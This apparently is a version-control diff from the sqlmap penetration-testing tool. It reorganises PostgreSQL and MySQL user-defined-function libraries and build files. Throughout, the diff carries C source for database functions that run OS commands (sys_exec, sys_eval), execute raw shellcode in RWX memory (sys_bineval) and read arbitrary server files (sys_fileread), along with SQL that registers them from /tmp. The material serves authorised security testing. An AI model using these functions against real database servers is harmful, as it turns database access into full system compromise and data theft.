+++ b/extra/postgresqludfsys/lib_postgresqludf_sys/windows/dll/8.2/lib_postgresqludf_sys.dll
--- a/extra/postgresqludfsys/lib_postgresqludf_sys/windows/dll/8.3/lib_postgresqludf_sys.dll
+++ b/extra/postgresqludfsys/lib_postgresqludf_sys/windows/dll/8.3/lib_postgresqludf_sys.dll
--- a/extra/postgresqludfsys/lib_postgresqludf_sys/windows/src/8.2/lib_postgresqludf_sys.c
+++ b/extra/postgresqludfsys/lib_postgresqludf_sys/windows/src/8.2/lib_postgresqludf_sys.c
@@ -1,192 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <ctype.h>
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-PG_FUNCTION_INFO_V1(sys_exec);
-extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	int32 result = 0;
-	char *command;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char line[1024];
-	int32 outlen, linelen;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	result = (char *)malloc(1);
-	outlen = 0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-	//SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-	memcpy(VARDATA(result_text), result, strlen(result));
-
-	PG_RETURN_POINTER(result_text);
-}
-
-PG_FUNCTION_INFO_V1(sys_bineval);
-extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	len = (size_t)argv0_size;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, VARDATA(argv0), len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		PG_RETURN_INT32(1);
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			PG_RETURN_INT32(1);
-
-		strncpy((char *)addr, VARDATA(argv0), len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	PG_RETURN_INT32(0);
-}
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-
-	}
-
-	return 0;
-}
-#endif
--- a/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz
+++ b/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz
--- a/extra/runcmd/README.txt
+++ b/extra/runcmd/README.txt
@@ -0,0 +1,7 @@
+Files in this folder can be used to compile auxiliary program that can
+be used for running command prompt commands skipping standard "cmd /c" way. 
+They are licensed under the terms of the GNU Lesser General Public License 
+and it's compiled version is available on the official sqlmap subversion
+repository[1].
+
+[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_
--- a/extra/runcmd/windows/README.txt
+++ b/extra/runcmd/windows/README.txt
@@ -0,0 +1,4 @@
+Compile only the Release version because the Runtime library option
+(Project Properties -> Configuration Properties -> C/C++ -> Code
+Generation) is set to "Multi-threaded (/MT)", which statically links
+everything into executable and doesn't compile Debug version at all.
--- a/extra/runcmd/windows/runcmd.sln
+++ b/extra/runcmd/windows/runcmd.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
--- a/extra/postgresqludfsys/lib_postgresqludf_sys/windows/lib_postgresqludf_sys.sql
+++ b/extra/postgresqludfsys/lib_postgresqludf_sys/windows/lib_postgresqludf_sys.sql
@@ -1,8 +1,7 @@
 /* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
+	runcmd - a program for running command prompt commands
+	Copyright (C) 2010 Miroslav Stampar
+	email: miroslav.stampar@gmail.com
 	
 	This library is free software; you can redistribute it and/or
 	modify it under the terms of the GNU Lesser General Public
@@ -19,6 +18,29 @@
 	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 */

-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'lib_postgresqludf_sys.dll', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'lib_postgresqludf_sys.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS 'lib_postgresqludf_sys.dll', 'sys_bineval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+#include <stdio.h>
+#include <windows.h>
+#include <use_ansi.h>
+#include "stdafx.h"
+#include <string>
+
+using namespace std;
+int main(int argc, char* argv[])
+{
+  FILE *fp;
+  string cmd;
+
+  for( int count = 1; count < argc; count++ )
+	cmd += " " + string(argv[count]);
+
+  fp = _popen(cmd.c_str(), "r");
+
+  if (fp != NULL) {
+    char buffer[BUFSIZ];
+
+    while (fgets(buffer, sizeof buffer, fp) != NULL)
+      fputs(buffer, stdout);
+  }
+
+  return 0;
+}
--- a/extra/runcmd/windows/runcmd/runcmd.vcproj
+++ b/extra/runcmd/windows/runcmd/runcmd.vcproj
@@ -0,0 +1,225 @@
+<?xml version="1.0" encoding="windows-1250"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="runcmd"
+	ProjectGUID="{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
+	RootNamespace="runcmd"
+	Keyword="Win32Proj"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="0"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCWebDeploymentTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
+				RuntimeLibrary="0"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="1"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCWebDeploymentTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\runcmd.cpp"
+				>
+			</File>
+			<File
+				RelativePath=".\stdafx.cpp"
+				>
+				<FileConfiguration
+					Name="Debug|Win32"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+				<FileConfiguration
+					Name="Release|Win32"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+			<File
+				RelativePath=".\stdafx.h"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+		<File
+			RelativePath=".\ReadMe.txt"
+			>
+		</File>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>
--- a/extra/runcmd/windows/runcmd/stdafx.cpp
+++ b/extra/runcmd/windows/runcmd/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// runcmd.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
--- a/extra/runcmd/windows/runcmd/stdafx.h
+++ b/extra/runcmd/windows/runcmd/stdafx.h
@@ -0,0 +1,17 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#ifndef _WIN32_WINNT		// Allow use of features specific to Windows XP or later.                   
+#define _WIN32_WINNT 0x0501	// Change this to the appropriate value to target other versions of Windows.
+#endif						
+
+#include <stdio.h>
+#include <tchar.h>
+
+
+
+// TODO: reference additional headers your program requires here
--- a/extra/udfhack/README.txt
+++ b/extra/udfhack/README.txt
@@ -0,0 +1,7 @@
+Files in this folder can be used to compile shared objects that define
+some user-defined functions for MySQL and PostgreSQL. They are licensed
+under the terms of the GNU Lesser General Public License and their
+compiled versions are available on the official sqlmap subversion
+repository[1].
+
+[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/udf/
--- a/extra/udfhack/linux/README.txt
+++ b/extra/udfhack/linux/README.txt
@@ -0,0 +1,22 @@
+Before compiling, you need to adapt the following to your environment:
+
+Variables in install.sh script:
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+USER                    Database management system administrative username
+PORT                    Database management system port
+VERSION                 Database management system version (PostgreSQL only)
+
+Variable in Makefile (MySQL only):
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+LIBDIR                  Database management system absolute file system
+                        path for third party libraries
+
+Then you can launch './install.sh' if you want to compile the shared
+object from the source code and create the user-defined functions on the
+database management system.
+If you only want to compile the shared object, you need to call only the
+'make' command.
--- a/extra/udfhack/linux/lib_mysqludf_sys/Makefile
+++ b/extra/udfhack/linux/lib_mysqludf_sys/Makefile
@@ -0,0 +1,9 @@
+# For MySQL < 5.1
+LIBDIR=/usr/lib
+# For MySQL >= 5.1
+#LIBDIR=/usr/lib/mysql/plugin
+
+install:
+	gcc -Wall -I/usr/include/mysql -Os -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
+	strip -sx lib_mysqludf_sys.so
+	cp -f lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so
--- a/extra/mysqludfsys/lib_mysqludf_sys/linux/install.sh
+++ b/extra/mysqludfsys/lib_mysqludf_sys/linux/install.sh
@@ -1,7 +1,7 @@
 #!/bin/bash
 # lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
 # Copyright (C) 2007  Roland Bouman 
-# Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+# Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
 # web: http://www.mysqludf.org/
 # email: mysqludfs@gmail.com, bernardo.damele@gmail.com
 # 
@@ -20,8 +20,8 @@
 # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA

 # Adapt the following settings to your environment
-PORT="3306"
 USER="root"
+PORT="3306"

 echo "Compiling the MySQL UDF"
 make
@@ -29,7 +29,7 @@ make
 if test $? -ne 0; then
 	echo "ERROR: You need libmysqlclient development software installed"
 	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-	echo "apt-get install libmysqlclient15-dev"
+	echo "apt-get install libmysqlclient-dev"
 	exit 1
 else
 	echo "MySQL UDF compiled successfully"
--- a/extra/mysqludfsys/lib_mysqludf_sys/windows/src/lib_mysqludf_sys.c
+++ b/extra/mysqludfsys/lib_mysqludf_sys/windows/src/lib_mysqludf_sys.c
@@ -1,7 +1,7 @@
 /* 
 	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
 	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
 	web: http://www.mysqludf.org/
 	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
 	
--- a/extra/mysqludfsys/lib_mysqludf_sys/linux/lib_mysqludf_sys.sql
+++ b/extra/mysqludfsys/lib_mysqludf_sys/linux/lib_mysqludf_sys.sql
@@ -1,7 +1,7 @@
 /*
        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
        Copyright (C) 2007  Roland Bouman
-        Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+        Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
        web: http://www.mysqludf.org/
        email: roland.bouman@gmail.com, bernardo.damele@gmail.com

--- a/extra/udfhack/linux/lib_postgresqludf_sys/Makefile
+++ b/extra/udfhack/linux/lib_postgresqludf_sys/Makefile
@@ -0,0 +1,16 @@
+LIBDIR=/tmp
+
+8.4:
+	gcc -Wall -I/usr/include/postgresql/8.4/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
+
+8.3:
+	gcc -Wall -I/usr/include/postgresql/8.3/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
+
+8.2:
+	gcc -Wall -I/usr/include/postgresql/8.2/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
--- a/extra/postgresqludfsys/lib_postgresqludf_sys/linux/install.sh
+++ b/extra/postgresqludfsys/lib_postgresqludf_sys/linux/install.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
 # lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-# Copyright (C) 2009  Bernardo Damele A. G.
+# Copyright (C) 2009-2010  Bernardo Damele A. G.
 # web: http://bernardodamele.blogspot.com/
 # email: bernardo.damele@gmail.com
 # 
@@ -19,11 +19,13 @@
 # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA

 # Adapt the following settings to your environment
-#PORT="5433"
-#VERSION="8.2"
-PORT="5432"
-VERSION="8.3"
 USER="postgres"
+PORT="5434"
+VERSION="8.4"
+#PORT="5433"
+#VERSION="8.3"
+#PORT="5432"
+#VERSION="8.2"

 echo "Compiling the PostgreSQL UDF"
 make ${VERSION}
@@ -34,8 +36,10 @@ if test $? -ne 0; then

 	if test "${VERSION}" == "8.2"; then
 		echo "apt-get install postgresql-server-dev-8.2"
-	else
+	elif test "${VERSION}" == "8.3"; then
 		echo "apt-get install postgresql-server-dev-8.3"
+	elif test "${VERSION}" == "8.4"; then
+		echo "apt-get install postgresql-server-dev-8.4"
 	fi

 	exit 1
--- a/extra/postgresqludfsys/lib_postgresqludf_sys/linux/src/8.3/lib_postgresqludf_sys.c
+++ b/extra/postgresqludfsys/lib_postgresqludf_sys/linux/src/8.3/lib_postgresqludf_sys.c
@@ -1,6 +1,6 @@
 /* 
 	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
 	web: http://bernardodamele.blogspot.com/
 	email: bernardo.damele@gmail.com
 	
@@ -47,7 +47,11 @@ PG_MODULE_MAGIC;
 #endif

 PG_FUNCTION_INFO_V1(sys_exec);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	int32 argv0_size;
 	int32 result = 0;
@@ -72,7 +76,11 @@ extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
 }

 PG_FUNCTION_INFO_V1(sys_eval);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	text *result_text;
 	int32 argv0_size;
@@ -112,15 +120,22 @@ extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
 	}

 	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	//VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#ifdef SET_VARSIZE
 	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
 	memcpy(VARDATA(result_text), result, strlen(result));

 	PG_RETURN_POINTER(result_text);
 }

 PG_FUNCTION_INFO_V1(sys_bineval);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	int32 argv0_size;
 	size_t len;
@@ -190,3 +205,70 @@ DWORD WINAPI exec_payload(LPVOID lpParameter)
 	return 0;
 }
 #endif
+
+#undef fopen
+
+PG_FUNCTION_INFO_V1(sys_fileread);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	int32 len;
+	int32 i, j;
+	char *filename;
+	char *result;
+	char *buffer;
+	char table[] = "0123456789ABCDEF";
+	FILE *file;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	filename = (char *)malloc(argv0_size + 1);
+
+	memcpy(filename, VARDATA(argv0), argv0_size);
+	filename[argv0_size] = '\0';
+	
+	file = fopen(filename, "rb");
+	if (!file)
+	{
+		PG_RETURN_NULL();
+	}
+	fseek(file, 0, SEEK_END);
+	len = ftell(file);
+	fseek(file, 0, SEEK_SET);
+
+	buffer=(char *)malloc(len + 1);
+	if (!buffer)
+	{
+		fclose(file);
+		PG_RETURN_NULL();
+	}
+
+	fread(buffer, len, 1, file);
+	fclose(file);
+
+	result = (char *)malloc(2*len + 1);
+	for (i=0, j=0; i<len; i++)
+	{
+		result[j++] = table[(buffer[i] >> 4) & 0x0f];
+		result[j++] = table[ buffer[i]	   & 0x0f];
+	}
+	result[j] = '\0';
+	
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+	
+	free(result);
+	free(buffer);
+	free(filename);
+
+	PG_RETURN_POINTER(result_text);
+}
--- a/extra/postgresqludfsys/lib_postgresqludf_sys/linux/lib_postgresqludf_sys.sql
+++ b/extra/postgresqludfsys/lib_postgresqludf_sys/linux/lib_postgresqludf_sys.sql
@@ -1,6 +1,6 @@
 /* 
 	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
 	web: http://bernardodamele.blogspot.com/
 	email: bernardo.damele@gmail.com
 	
@@ -22,3 +22,4 @@
 CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
 CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
 CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_bineval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+CREATE OR REPLACE FUNCTION sys_fileread(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_fileread' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
--- a/extra/udfhack/windows/README.txt
+++ b/extra/udfhack/windows/README.txt
@@ -0,0 +1,25 @@
+Before compiling, certain enviroment variables have to be set,
+depending on the project used. For project lib_mysqludf_sys variables
+PLATFORM_SDK_DIR and MYSQL_SERVER_DIR have to be set, while for project
+lib_postgresqludf_sys variables PLATFORM_SDK_DIR and
+POSTGRESQL_SERVER_DIR.
+
+Variables:
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		Directory where the Platform SDK is installed
+MYSQL_SERVER_DIR		Directory where the MySQL is installed
+POSTGRESQL_SERVER_DIR	Directory where the PostgreSQL is installed
+
+Procedure for setting environment variables:
+My Computer -> Properties -> Advanced -> Environment Variables
+User variables -> New
+
+Sample values:
+--------------------------------------------------------------------------
+Variable name			Variable value
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
+MYSQL_SERVER_DIR		C:\Program Files\MySQL\MySQL Server 5.1
+POSTGRESQL_SERVER_DIR	C:\Program Files\PostgreSQL\8.4
--- a/extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys.sln
+++ b/extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual C++ Express 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_mysqludf_sys", "lib_mysqludf_sys\lib_mysqludf_sys.vcproj", "{4D362A3E-CA53-444C-B1C8-C49641823875}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.ActiveCfg = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.Build.0 = Debug|Win32
